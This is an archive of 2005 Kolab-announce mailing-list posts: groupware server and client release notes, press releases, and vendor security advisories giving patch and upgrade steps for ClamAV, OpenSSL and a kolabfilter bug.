- php-4.3.9-2.2.2 -> php-4.3.9-2.2.2_kolab
  * Kolab specific versions of the packages with a patch that adds
    support for annotations in cimap and its php bindings. Unused so far.
- imapd-2.2.12-2.3.0_kolab3 -> imapd-2.2.12-2.3.0_kolab4
  * Fixing:
    Issue784 (managesieve undef symbol)
- kolabd 20050601 -> 20050615
  * Moved kolabfilter settings verify_from and allow_sender to LDAP and
    some other changes related to the fix for Issue783
  * Fixing:
    Issue779 (german quota warning)
- kolab-webadmin 20050530 -> 20050616
  * Make verify_from and allow_sender accessible from webgui. This is
    part of the fix for Issue783
  * Added french translations. Doesn't work properly yet, though.
  * Fixes:
    Issue722 (webgui language switching)
    Issue804 (addressbook collision with distribution-list)
    Issue797 (better confirmation dialog for deleting distribution list)
- kolab-resource-handlers 20050520 -> 20050615
  * disable SID creation
  * Increase the maximal execution time for php scripts
  * Substantial improvement of the performance of the partial free/busy
    generation (this is part of the fix for Issue793)
  * Fixing:
    Issue778 (mail alias for free/busy retrieval)
    Issue783 (envelope header from check has problems with mailinglists)
    Issue793 (php aborts on long pfb creations)

$Id: release-notes.txt,v 1.15 2005/06/17 15:03:40 bh Exp $

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 2145 bytes
Desc: signature
Url : http://kolab.org/pipermail/kolab-announce/attachments/20050617/51eb74da/smime.bin

From bernhard at intevation.de Tue Jun 21 00:36:18 2005
From: bernhard at intevation.de (Bernhard Reiter)
Date: Tue, 21 Jun 2005 00:36:18 +0200
Subject: [Kolab-announce] Kolab 2.0 Groupware released!
Message-ID: <200506210036.23064.bernhard@intevation.de>

Almost two years after the stable release of Kolab 1, the Kolab team is proud to present the stable releases of Kolab Server 2.0 and KDE Kolab Client 2.0!

Attached the text version of the press release from http://www.kolab.org/news/pr-20050620.html and the release notes for server and client for your convenience.

Thanks to all supporters, testers and helpers.

Spread the word,
Bernhard

-------------- next part --------------
DATELINE June 20th, 2005
FOR IMMEDIATE RELEASE

Kolab 2 Groupware released

The Kolab Groupware Project (http://www.kolab.org) today announced the immediate availability of Kolab 2, a reliable and extremely scalable groupware solution for GNU/Linux that can replace Microsoft Exchange. Besides emails, the solution empowers users to manage and share their appointments, contacts and tasks without the necessity of being constantly online.

"With our focus on native offline-capable clients, Kolab 1 had brought a new approach to the groupware world," explains Bernhard Reiter, CEO of Intevation GmbH and project coordinator. "With this second generation, users can now share their groupware folders even with users that use Outlook when they are using KDE and vice versa."

Additional new features are support for servers at several locations, usability, speed improvements, support for spam-control and anti virus software. The new stable release 2.0 has been about two years in coming as 1.0 has been released in mid 2003. Beta versions of Kolab 2.0 have undergone intensive testing in the last 6 months.

"Kolab owes its scalability to its concept", explains Martin Konold, senior partner at erfrakon, who designed the Kolab architecture, "all groupware data is stored on the IMAP server in MIME structures instead of using a traditional database. Thanks to the smart client concept, most CPU-intensive operations are performed on the client. Cyrus, the chosen IMAP server software, also allows for an on-the-fly backup of the IMAP store."

The Kolab-Konsortium will present the Kolab Solution at LinuxTag in Karlsruhe (Booth B81, Intevation GmbH) this week. Additionally, Bernhard Reiter will give a presentation on Thursday, 13:00-14:00h.

Kolab has an active and growing community that can be reached via several active mailing lists as well as the Kolab Wiki at http://wiki.kolab.org. Enterprise-level support is available from the Kolab Konsortium.

All daily administration tasks can be performed via a web interface. The OpenPKG environment makes the server easy to deploy on all kinds of GNU/Linux distributions and Unix derivatives. Just like its predecessor, Kolab 2 is based on well-proven Free Software server components, such as Apache, Postfix, Cyrus imapd and OpenLDAP.

Windows users can keep their Outlook installation: The Toltec Connector 2.0 turns Outlook into a fully-fledged Kolab 2 client at low cost. Additionally, a special convenience package of Kontact, the KDE Groupware client, has been made available. It has undergone special testing by the Kolab-Konsortium and can be used with KDE 3.2 and higher. Users that cannot upgrade to KDE 3.4.1 should use this package for client deployment. Kontact is a feature-complete Kolab 2 client.

"A unique property of the Kolab Project is that it uses existing proven components and works very closely with the associated Free Software communities," says Kalle Dalheimer, CEO of Klarälvdalens Datakonsult AB, the company that did the actual software implementation. "For example, our KDE Kolab client benefits from the full S/MIME capabilities for email signatures and encryption done by a different project."

In addition to the native clients a Kolab-compliant web interface based on the Horde Framework is in beta stage and will become available later in 2005.

About the Kolab Konsortium

The Kolab Konsortium was founded by Intevation GmbH, Klarälvdalens Datakonsult AB and erfrakon Partnerschaftsgesellschaft, the creators of Kolab. The Konsortium offers courses, consultancy, development and enterprise-level support for the Kolab server and clients. It works together with Radley Network Technologies CC (open file-format for the Toltec Connector) and Code Fusion CC. Read more about the Kolab Konsortium at http://www.kolab-konsortium.de

Press Contact:
Bernhard Reiter
Kolab-Konsortium
Georgstraße 4
49074 Osnabrück
Germany
Phone: +49-541-3350830
Fax: +49-541-3350859
Email: info at kolab-konsortium.de

About KDE

KDE is a powerful Free Software graphical desktop environment for GNU/Linux and Unix workstations. It combines ease of use, modern functionality, and outstanding graphical design with the technological superiority of the Unix operating system. Read more about KDE at http://www.kde.org.

Press Contact:
Matthias Kalle Dalheimer
Rysktorp
S-683 92 Hagfors
Sweden
Phone: +46-563-540023
Fax: +46-563-540028
Email: info at kde.org

-------------- next part --------------
Release notes Kolab2 Server (Version 20050620, Kolab server 2.0 final)

For upgrading and installation instructions, please refer to the 1st.README file in the source directory.

Changes since RC 4, 20050617:

- kolab-webadmin 20050530 -> 20050616
  * Fixing: Issue813 (password entry not of type password)
            Issue810 (Cannot delete addressbook entry)

$Id: release-notes.txt,v 1.16 2005/06/20 16:25:21 bh Exp $
-------------- next part --------------
Release notes for the Kolab KDE Client 2.0
==========================================

2005-06-20, Bernhard Herzog

Changes since 2.0 RC 3
----------------------

kmail
-----

* Don't allow operations to be performed on items which are already being operated on. Namely holding down the Del key was triggering multiple Deletes/Moves for the same message pointer, which for any but the first command was dangling. Quite obvious, in retrospect... (backport)
* Make sure that the cc is properly taken into account during identity detection on replies. (backport)
* Don't use KIO::del to delete the local cache when removing a dimap folder. The underlying KMFolderMailDir does unlinks, to avoid a storm of progress dialogs, so let's rely on that. (backport)
* Show icon as checked when it is. https://intevation.de/roundup/aegypten/issue324.
* Backport of status setting fix: if the status of single mails was changed locally, but nothing else, the "status changed locally" flag was not set, and the status changes thus lost on sync.
* Two extra special paranoid sync state resets in impossible code paths just to make sure we don't delete mail unwantedly even if hell freezes over.
* Updated version number to proko2 2.0

kontact
-------

* Start korgac when starting kontact, so that reminders work even if the user doesn't click on the Calendar icon. https://intevation.de/roundup/kolab/issue789
* Updated version number to proko2 2.0

korganizer
----------

* The format for kmail serial numbers is kmail:foo/bar, not kmail://foo/bar. Adjust.
* Much simpler way of starting korgac; don't start korgac from the korganizer part, kontact does it now.

libkdepim
---------

* Remove config(), use the one from KABC instead to avoid two singletons. Fixes "ldap config changes not immediately honored by kaddressbook" https://intevation.de/roundup/kolab/issue795
* Very tricky bug in the LDAP parsing code, leading to corrupted entries, e.g. with 'name' and 'email' being set to the name. QByteArray is explicitly shared, so when we get new contents from the LDIF parser class, we need to detach it before putting it into a list... https://intevation.de/roundup/kolab/issue796

kaddressbook
------------

* Fix signal/slot connection error

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 2145 bytes
Desc: signature
Url : http://kolab.org/pipermail/kolab-announce/attachments/20050621/1719615c/smime.bin

From bh at intevation.de Wed Jul 27 16:34:44 2005
From: bh at intevation.de (Bernhard Herzog)
Date: Wed, 27 Jul 2005 16:34:44 +0200
Subject: [Kolab-announce] Security Advisory 02 for Kolab Server
Message-ID:

The Clam AntiVirus package used by Kolab 2.0 contains several buffer overflows that can be exploited remotely. A new ClamAV RPM with a fix is available. See the Kolab Security Advisory 02 below for details.

Bernhard Herzog

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Kolab Security Issue 02 20050727
================================

Package: Kolab Server
Vulnerability: buffer overflow, remotely exploitable
Kolab Specific: no
Dependent Packages: none

Summary
- -------

The Clam AntiVirus package contains several buffer overflows that can be exploited remotely.

Affected Versions
- -----------------

This affects all servers which have ClamAV 0.86.1 or earlier versions running. Kolab Server 2.0 and previous releases of the 2.0 branch are affected.

Fixes
- -----

Upgrade to ClamAV 0.86.2.

A new ClamAV RPM is available from the Kolab download mirrors as the file
security-updates/20050727/clamav-0.86.2-20050726.src.rpm

The mirrors are listed on http://kolab.org/mirrors.html

While the mirrors are catching up, you can also get the package via rsync:

# rsync -tzv rsync://rsync.kolab.org/kolab/server/security-updates/20050727/clamav-0.86.2-20050726.src.rpm .

This package can be installed on your Kolab Server with

# /kolab/bin/openpkg rpm --rebuild clamav-0.86.2-20050726.src.rpm
# /kolab/bin/openpkg rpm \
    -Uvh /kolab/RPM/PKG/clamav-0.86.2-20050726.--kolab.rpm
##optional
# /kolab/bin/freshclam

Details
- -------

http://www.securityfocus.com/bid/14359
  the vulnerabilities present themselves when the ClamAV antivirus library handles malformed files.

Details of the vulnerability can be found in
http://www.rem0te.com/public/images/clamav.pdf
  At least 4 of its file format processors contain remote security bugs. Specifically, during the processing of TNEF, CHM, & FSG formats an attacker is able to trigger several integer overflows. These vulnerabilities can be reached by default and triggered without user interaction by sending an e-mail containing crafted data.

Timeline
- --------

20050725 clamav vulnerability published by rem0te
20050727 kolab update and security advisory published

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFC55W50vCiU5+ISsgRAuRRAJwPMHzzXu0FwB9GeEv6kq3WOBqvdwCeLKot
d85iJsTD7wjyY+ebkIzklQk=
=NPAR
-----END PGP SIGNATURE-----

--
Intevation GmbH                 http://intevation.de/
Skencil                           http://skencil.org/
Thuban                   http://thuban.intevation.org/

From bh at intevation.de Wed Sep 14 21:37:58 2005
From: bh at intevation.de (Bernhard Herzog)
Date: Wed, 14 Sep 2005 21:37:58 +0200
Subject: [Kolab-announce] Kolab Server 2.0.1 released
Message-ID: <200509142138.02221.bh@intevation.de>

Kolab Server 2.0.1 has been released

The biggest change in this release is the move to OpenPKG 2.4 as the basis for the kolab server. This move is necessary to benefit from the security updates from OpenPKG as the version of OpenPKG used in Kolab Server 2.0.0 is not maintained anymore by the OpenPKG project. As a result the new packages in this release fix some security problems present in the packages of the previous Kolab Server releases. See the release notes (attached) for more details. We recommend updating Kolab installations to this new kolab server release.

Other than security updates, there have been some bug fixes (see release notes).

Bernhard Herzog

-------------- next part --------------
Release notes Kolab2 Server (Version 20050913, Kolab Server 2.0.1)

For upgrading and installation instructions, please refer to the 1st.README file in the source directory.

Since 2.0.1 RC1:

- security fixes from OpenPKG:
    pcre-6.0-2.4.1                 OpenPKG-SA-2005.018
    fsl-1.6.0-2.4.1                OpenPKG-SA-2005.018
    proftpd-1.3.0rc1-2.4.1         OpenPKG-SA-2005.020
    apache-1.3.33-2.4.1_kolab      OpenPKG-SA-2005.017
  because of the dependencies, some other packages were also updated. Others need to be explicitly rebuilt because of static linking and the same version number:
    dbtool-1.6-2.4.0
    grep-2.5.1a-2.4.0
    openldap-2.2.27-2.4.0_kolab
    php-4.3.11-2.4.0_kolab
    postfix-2.2.3-2.4.1_kolab
    procmail-3.22-2.4.0
    sasl-2.1.21-2.4.0
    spamassassin-3.0.3-2.4.1
- imapd-2.2.12-2.4.0_kolab2
  * Fixing: Issue782 (setinfo for mailboxes in Admin.pm for Cyrus)
            Issue901 (reconstruct in Admin.pm or imapd calls wrong binaries)
- kolabd-1.9.4-20050913
  * Fixing: Issue851 (kolabquotawarn uses system sendmail)
            Issue885 (kolabd creates shared folders in wrong directory)
- kolab-resource-handlers-0.3.9-20050912
  * Fixing: Issue878 (fb retrieval only works with lowercase email addresses)
- kolab-webadmin-0.4.0-20050831
  * Fixing: Issue915 (non-ascii not handled correctly in webadmin interface)
- perl-kolab-5.8.7-2.0_20050912
  better logging when running kolabconf

Changes since 2.0:

- Switch to OpenPKG 2.4. As a result of this, practically all packages have been updated.
  Up to now the Kolab Server used OpenPKG 2.2. The current release of OpenPKG is 2.4, though, and the OpenPKG project only provides security advisories and updates for the most recent release and its immediate predecessor. Therefore moving to OpenPKG 2.4 is necessary to benefit from the OpenPKG updates.
  The db package has not been updated to the version from OpenPKG 2.4 yet to avoid potential stability problems with OpenLDAP.
- Security update for OpenPKG 2.4:
    zlib-1.2.2-2.4.2   OpenPKG-SA-2005.014 and OpenPKG-SA-2005.013
- A new clamav package fixing a buffer overflow. This is the package mentioned in the kolab security advisory 02 http://kolab.org/security/kolab-vendor-notice-02.txt
- better deletion handling. Now more objects are deleted using kolabDeleteFlag (issues 845 and 855)
- perl-kolab 5.8.5-20050530 -> 5.8.7-2.0_20050719
  * Fixing: Issue845 (groupOfNames cleanup handling)
            Issue855 (make shared folder and external deletion same as users)
- kolab-webadmin 20050616 -> 20050620
  * Fixing: Issue845 (groupOfNames cleanup handling)
            Issue855 (make shared folder and external deletion same as users)
- kolabd 20050615 -> 20050722
  * Fixing: Issue791 (automatic invitation handling uses http instead of https)
            Issue845 (groupOfNames cleanup handling)
            Issue851 (kolabquotawarn uses system sendmail)
            Issue855 (make shared folder and external deletion same as users)
- kolab-resource-handlers 20050615 -> 20050727
  * Fixing: Issue825 (Bad error handling of kolabmailboxfilter)

$Id: release-notes.txt,v 1.15.2.7 2005/09/14 17:57:58 thomas Exp $
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://kolab.org/pipermail/kolab-announce/attachments/20050914/fd5790f2/attachment.bin

From thomas at intevation.de Wed Sep 21 18:26:31 2005
From: thomas at intevation.de (Thomas Arendsen Hein)
Date: Wed, 21 Sep 2005 18:26:31 +0200
Subject: [Kolab-announce] Security Advisory 03 for Kolab Server
Message-ID: <20050921162631.GA9273@intevation.de>

Kolab Security Issue 03 20050921
================================

Package: Kolab Server
Vulnerability: buffer overflow, DOS, remotely exploitable
Kolab Specific: no
Dependent Packages: none

Summary
-------

The Clam AntiVirus package contains a boundary condition error and fails to handle exceptional conditions, which can be exploited remotely.

Affected Versions
-----------------

This affects all servers which have ClamAV 0.86.2 or earlier versions running. Kolab Server 2.0.1 and previous releases of the 2.0 branch are affected.

Fixes
-----

Upgrade to ClamAV 0.87.

A new ClamAV RPM is available from the Kolab download mirrors as
security-updates/20050921/clamav-0.87-20050916.src.rpm

A binary RPM for Debian woody (ix86) is available as
security-updates/20050921/clamav-0.87-20050916.ix86-debian3.0-kolab.rpm

The mirrors are listed on http://kolab.org/mirrors.html

While the mirrors are catching up, you can also get the package via rsync:

# rsync -tzv rsync://rsync.kolab.org/kolab/server/security-updates/20050921/clamav-0.87-20050916.src.rpm .

This package can be installed on your Kolab Server with

# /kolab/bin/openpkg rpm --rebuild clamav-0.87-20050916.src.rpm
# /kolab/bin/openpkg rpm \
    -Uvh /kolab/RPM/PKG/clamav-0.87-20050916.--kolab.rpm

A new /kolab/etc/clamav/clamav.conf will probably be written, remove the clamav.conf.rpmsave file, run kolabconf and make sure clamav starts:

# rm /kolab/etc/clamav/clamav.conf
# /kolab/sbin/kolabconf
# /kolab/etc/rc clamav start
##optional
# /kolab/bin/freshclam

Details
-------

http://www.securityfocus.com/bid/14866
  ClamAV UPX Compressed Executable Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/14867
  ClamAV FSG Compressed Executable Infinite Loop DOS Vulnerability

Timeline
--------

20050916 clamav vendor released combined security and functional update
20050921 kolab update and security advisory published

--
Email: thomas at intevation.de
http://intevation.de/~thomas/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://kolab.org/pipermail/kolab-announce/attachments/20050921/43152311/attachment.bin

From bh at intevation.de Fri Oct 14 22:52:43 2005
From: bh at intevation.de (Bernhard Herzog)
Date: Fri, 14 Oct 2005 22:52:43 +0200
Subject: [Kolab-announce] Security Advisory 04 for Kolab Server (openssl)
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Kolab Security Issue 04 20051014
================================

Package: openssl
Vulnerability: Potential SSL 2.0 Rollback (CAN-2005-2969)
Kolab Specific: no
Dependent Packages: apache imapd openldap perl-ssl php postfix proftpd sasl

Summary
- -------

According to a vendor security advisory, a potential SSL 2.0 protocol rollback attack vulnerability exists in the cryptography toolkit OpenSSL. The vulnerability potentially affects applications that use the SSL/TLS server implementation provided by OpenSSL. Such applications are affected if they use the option "SSL_OP_MSIE_SSLV2_RSA_PADDING". Applications using neither "SSL_OP_MSIE_SSLV2_RSA_PADDING" nor "SSL_OP_ALL" are not affected. Also, applications that disable use of SSL 2.0 are not affected.

Affected Versions
- -----------------

OpenPKG packages of openssl-0.9.7g-2.4.1 or earlier are affected. Kolab Server 2.0.1 and previous releases of the 2.0 branch are affected.

You can check the installed version with:

  /kolab/bin/openpkg rpm -q openssl

Fixes
- -----

Note: The fix described here is for Kolab server 2.0.1. If you still run an older version, please upgrade to 2.0.1 first.

Since SSLv2 can't be disabled via a configuration setting for all services running on a Kolab server, the OpenSSL package has to be updated and the dependent packages have to be rebuilt so that they use the new OpenSSL version.

The updated OpenPKG package openssl-0.9.7g-2.4.2 is available from the usual kolab mirrors under the directory security-updates/20051014/ .

While the mirrors are catching up, you can also get the files via rsync:

# rsync -tzvr rsync://rsync.kolab.org/kolab/server/security-updates/20051014 .

If you have installed the Kolab server from sources, download the directory security-updates/20051014/sources/

If you installed the ix86-debian3.0 binaries, download security-updates/20051014/ix86-debian3.0/

Both directories contain the new OpenSSL package plus obmtool and obmtool.conf like in a kolab release. In addition, the ix86-debian3.0 directory contains updated binaries of the dependent packages.

In both cases, download all files in the appropriate directory, chdir into the downloaded directory and run

  /kolab/bin/openpkg rc all stop
  ./obmtool kolab

This will install the new openssl package and rebuild/reinstall the dependent packages. Afterwards start the server again, making sure to regenerate the config files as you would for a normal Kolab server update.

Details
- -------

http://www.openpkg.org/security/OpenPKG-SA-2005.022-openssl.html
  OpenPKG Security Advisory OpenPKG-SA-2005.022
http://www.openssl.org/news/secadv_20051011.txt
  OpenSSL Security Advisory on the vendor's site
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2969
  Common Vulnerabilities and Exposures (CVE): CAN-2005-2969

Timeline
- --------

20051011 OpenSSL vendor released patch and new versions containing the fix
20051011 OpenPKG created new package containing the fix, not yet announced
20051014 Kolab update and security advisory published

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDUBdo0vCiU5+ISsgRApj4AKDIZhknDia/OrolG4yUGaC3JZwRWQCfXbyw
b6sFUXJ80PKVQkgbLbQDSNo=
=ff+w
-----END PGP SIGNATURE-----

From thomas at intevation.de Thu Oct 20 18:34:56 2005
From: thomas at intevation.de (Thomas Arendsen Hein)
Date: Thu, 20 Oct 2005 18:34:56 +0200
Subject: [Kolab-announce] Security Advisory 05 for Kolab Server
Message-ID: <20051020163455.GA25596@intevation.de>

Kolab Security Issue 05 20051020
================================

Package: clamav
Vulnerability: buffer overflow, DOS, remotely exploitable
Kolab Specific: yes
Dependent Packages: none

Summary
-------

Thorsten Schnebeck informed us on the kolab-users mailing list that the obmtool.conf file distributed with Kolab Security Issue 04 20051014 may cause a downgrade of clamav to a vulnerable version.

Affected Versions
-----------------

ClamAV-0.86.2 or earlier are affected.

You can check the installed version with:

  /kolab/bin/openpkg rpm -q clamav

Fixes
-----

Upgrade to ClamAV 0.87 again by following the instructions from Kolab Security Issue 03 20050921, included here for convenience:

A new ClamAV RPM is available from the Kolab download mirrors as
security-updates/20050921/clamav-0.87-20050916.src.rpm

A binary RPM for Debian woody (ix86) is available as
security-updates/20050921/clamav-0.87-20050916.ix86-debian3.0-kolab.rpm

The mirrors are listed on http://kolab.org/mirrors.html

Details
-------

http://kolab.org/security/kolab-vendor-notice-03.txt
  Kolab Security Issue 03 20050921
http://kolab.org/security/kolab-vendor-notice-04.txt
  Kolab Security Issue 04 20051014
http://kolab.org/pipermail/kolab-users/2005-October/003582.html
  Thorsten Schnebeck published the problem on kolab-users

Timeline
--------

20051014 Kolab Security Issue 04 published with incorrect obmtool.conf
20051020 Problem published on kolab-users mailing list
20051020 Problem confirmed and updated security advisory published

--
Email: thomas at intevation.de
http://intevation.de/~thomas/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://kolab.org/pipermail/kolab-announce/attachments/20051020/358dfd6c/attachment.bin

From bh at intevation.de Fri Nov 4 20:35:25 2005
From: bh at intevation.de (Bernhard Herzog)
Date: Fri, 4 Nov 2005 20:35:25 +0100
Subject: [Kolab-announce] Security Advisory 06 for Kolab Server
Message-ID: <200511042035.29582.bh@intevation.de>

Kolab Security Issue 06 20051104
================================

Package: Kolab Server
Vulnerability: buffer overflow, DOS, remotely exploitable
Kolab Specific: no
Dependent Packages: none

Summary
-------

The Clam AntiVirus package contains a boundary condition error and fails to handle exceptional conditions, which can be exploited remotely.

Affected Versions
-----------------

This affects all servers which have ClamAV 0.87 or earlier versions running. Kolab Server 2.0.1 and previous releases of the 2.0 branch are affected.

Fixes
-----

Upgrade to ClamAV 0.87.1

A new ClamAV RPM is available from the Kolab download mirrors as
security-updates/20051104/clamav-0.87.1-20051104.src.rpm

A binary RPM for Debian woody (ix86) is available as
security-updates/clamav-0.87.1-20051104.ix86-debian3.0-kolab.rpm

The mirrors are listed on http://kolab.org/mirrors.html

While the mirrors are catching up, you can also get the package via rsync:

# rsync -tzv rsync://rsync.kolab.org/kolab/server/security-updates/20051104/clamav-0.87.1-20051104.src.rpm .

MD5 sums:

474c7e68feeec520fb2b0b95cb084482  clamav-0.87.1-20051104.ix86-debian3.0-kolab.rpm
13be516211e28fd9d861de051a3d0c17  clamav-0.87.1-20051104.src.rpm

This package can be installed on your Kolab Server with

# /kolab/bin/openpkg rpm --rebuild clamav-0.87.1-20051104.src.rpm
# /kolab/bin/openpkg rpm \
    -Uvh /kolab/RPM/PKG/clamav-0.87.1-20051104.--kolab.rpm

The installation process will likely leave a freshclam.conf.rpmsave or clamav.conf.rpmsave in /kolab/etc/clamav/. Since freshclam.conf and clamav.conf are generated files, remove the rpmsave files, run kolabconf and make sure clamav starts. E.g.

# rm /kolab/etc/clamav/clamav.conf.rpmsave
# /kolab/sbin/kolabconf
# /kolab/etc/rc clamav start
##optional
# /kolab/bin/freshclam

Details
-------

http://sourceforge.net/project/shownotes.php?release_id=368319
  ClamAV 0.87.1 release notes

Timeline
--------

20051103 clamav vendor released combined security and functional update
20051104 kolab update and security advisory published

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://kolab.org/pipermail/kolab-announce/attachments/20051104/4d03f348/attachment.bin

From jan at intevation.de Thu Nov 17 10:23:15 2005
From: jan at intevation.de (Jan-Oliver Wagner)
Date: Thu, 17 Nov 2005 10:23:15 +0100
Subject: [Kolab-announce] Kolab wins "Best Groupware Server" Award
Message-ID: <20051117092315.GA18117@intevation.de>

For Immediate Release
Frankfurt, 15th of November 2005

Kolab wins "Best Groupware Server" Award

Kolab has been given the Linux New Media Award 2005 in the category 'Best Groupware Server'. The jury chose Kolab on top of contenders like Openexchange, OpenGroupware, GroupWise, eGroupWare, Scalix and Lotus Notes. This was revealed during a ceremony Tuesday evening at the LinuxWorld Expo 2005 in Frankfurt, Germany.

Within three years of its existence, Kolab has grown to be a respected groupware that was also mentioned positively in both editions of the Migration Guidelines for public administrations of the German Ministry of the Interior.

"While the focus is on enterprise users, many others have meanwhile come to appreciate our approach!" says Bernhard Reiter from the Kolab-Konsortium. "It is attractive because Kolab offers a modern, scalable server with a choice of clients for numerous platforms including KDE Kontact and full Microsoft Outlook support."

The jury consisted of about 200 experts selected by Linux New Media, a publisher of 14 regular magazines about GNU/Linux. The Awards are given out yearly in changing categories to recognise the most significant products, projects or organisations. Bernhard Reiter was also nominated to be part of the jury for the award, but abstained from any voting.

About Kolab:
Kolab is a groupware and email solution that integrates proven Free Software components. In Fall 2002 the project started aiming at environments with both GNU/Linux and Windows desktops. The design allows the integration with other products, e.g. directory and management services like dirActory, GOsa, or LAM.
www.kolab.org

About Kolab-Konsortium:
The Kolab-Konsortium offers commercial maintenance, support, consulting and development for Kolab. Members are Intevation, erfrakon and Klarälvdalens Datakonsult. Recently a partnership was announced to integrate Kolab into Univention's Corporate Server offering.
www.kolab-konsortium.com

Press Contact
Jan-Oliver Wagner
+49 541 33508 55
Jan-Oliver.Wagner at intevation.de

From bh at intevation.de Thu Dec 1 18:42:31 2005
From: bh at intevation.de (Bernhard Herzog)
Date: Thu, 1 Dec 2005 18:42:31 +0100
Subject: [Kolab-announce] Kolab Server 2.1 snapshot release 20051201
Message-ID: <200512011842.35747.bh@intevation.de>

Hi all,

I've just uploaded a new snapshot release of the Kolab Server 2.1 branch. You'll find it in the server/development-2.1 directory. The mirrors should have the files shortly.

The release notes are attached.

Bernhard

-------------- next part --------------
Release notes Kolab2 Server (Version 20051201, Kolab Server pre 2.1)

This is a development snapshot of the kolab server leading up to a 2.1 release.

For upgrading and installation instructions, please refer to the 1st.README file in the source directory. At this point an upgrade from 2.0 is not recommended. Instructions for the upgrade from 2.0 are in 1st.README, but they're not very well tested yet.

Differences between Kolab 2.0.x and 2.1:

- Simple multi-domain support
  The Kolab server can now accept mail for multiple email domains. There is also a new class of maintainers which are only allowed to manage settings for a subset of the mail domains of the kolab server.

Changes since 2.1-20050926:

- perl-kolab 5.8.7-20051122 -> 5.8.7-20051130
  * Group and resource accounts also use the calendar user now to write to the calendar folder when accepting invitations automatically.
- kolabd 2.0.99-20051122 -> 2.0.99-20051130
  * More autoconfiscation patches from Richard Bos
  * The kolab_smtpdpolicy makes use of the smtp authentication credentials used by the sender now.
  * Fixing: Issue1002 (Documented path to template is wrong in some files)
            Issue1004 (insufficient access for admins and maintainers)
            Issue1009 (Preparation patch for the autoconfiscated krh module)
- kolab-webadmin 2.0.99-20051122 -> 2.0.99-20051130
  * Fixing: Issue1007 (kolab-webadmin autoconfiscation patch by Richard Bos)
- kolab-horde-framework 2.0.99-20051122 -> 2.0.99-20051130
  * Fix dependencies
- kolab-resource-handlers 2.0.99-20051122 -> 2.0.99-20051130
  * Always use the calendar folder when writing to the calendar folder. kolabEncryptedPassword is no longer used.

$Id: release-notes.txt,v 1.24 2005/12/01 16:36:10 bh Exp $
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://kolab.org/pipermail/kolab-announce/attachments/20051201/16df3dc7/attachment.bin

From bernhard.herzog at intevation.de Thu Dec 15 20:13:10 2005
From: bernhard.herzog at intevation.de (Bernhard Herzog) Date: Thu, 15 Dec 2005 20:13:10 +0100 Subject: [Kolab-announce] Kolab Server 2.1 snapshot release 20051215 Message-ID: <200512152013.16200.bernhard.herzog@intevation.de> Hi all, I've just uploaded a new snapshot release of the Kolab Server 2.1 branch. You'll find it in the server/development-2.1 directory. The mirrors should have the files shortly. The release notes are attached. Bernhard -------------- next part -------------- Release notes Kolab2 Server (Version 20051215, Kolab Server pre 2.1) This is a development snapshot of the kolab server leading up to a 2.1 release. For upgrading and installation instructions, please refer to the 1st.README file in the source directory. At this point an upgrade from 2.0 is not recommended. Instructions for the upgrade from 2.0 are in 1st.README, but they're not very well tested yet. Differences between Kolab 2.0.x and 2.1: - Simple multi-domain support The Kolab server can now accept mail for multiple email domains. There is also a new class of maintainers which are only allowed to manage settings for a subset of the mail domains of the kolab server. Changes since 2.1-20051201: - Upgrade to OpenPKG 2.5 All RPMs have been updated to the latest OpenPKG 2.5 versions. This includes several security updates: http://www.openpkg.org/security/OpenPKG-SA-2005.025-perl.html http://www.openpkg.org/security/OpenPKG-SA-2005.027-php.html http://www.openpkg.org/security/OpenPKG-SA-2005.028-curl.html http://www.openpkg.org/security/OpenPKG-SA-2005.029-apache.html The new versions of the db and openldap RPMs require some manual intervention for this update. See 1st.README for details. 
- kolabd 2.0.99-20051130 -> 2.0.99-20051215
  * The documentation has been moved from /kolab/share/kolabd/doc to /kolab/share/doc/kolabd
  * Patches:
    Issue1017 (Autoconfiscation patch by Richard Bos)
    Issue1021 (Autoconfiscation patch by Richard Bos)
    Issue1027 (Fix for a problem introduced by autoconfiscation)
    Issue1028 (kolabd/namespace/libexec improvements)

- kolab-webadmin 2.0.99-20051130 -> 2.0.99-20051213
  * Updated Dutch translation (Richard Bos)
  * Fixing:
    Issue1023 (fix some typos in messages)

$Id: release-notes.txt,v 1.27 2005/12/15 18:57:19 bh Exp $

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://kolab.org/pipermail/kolab-announce/attachments/20051215/e913f652/attachment.bin

From bernhard.reiter at intevation.de Thu Dec 22 20:34:16 2005
From: bernhard.reiter at intevation.de (Bernhard Reiter)
Date: Thu, 22 Dec 2005 20:34:16 +0100
Subject: [Kolab-announce] Security Advisory 07 for Kolab Server
Message-ID: <200512222034.16887.bernhard.reiter@intevation.de>

-------------- next part --------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Kolab Security Issue 07 20051222
================================

Package: Kolab Server
Vulnerability: Some transported emails are modified, potentially leading to broken email signatures or attachments.
Kolab Specific: yes
Impact: low

Summary
- --------

If the Kolab Server transports an email bigger than 8 KByte and there is a dot (".") character at the wrong place, kolabfilter will double this dot and a modified email will be delivered. This can lead to broken email clear-text signatures or broken attachments.

Affected Versions
- -----------------

All Kolab Servers version 2 released so far, including 2.1 snapshots. In particular, versions 2.0.0 and 2.0.1 have this bug.

Fixes
- -----

Apply the patch below, e.g. with the command:

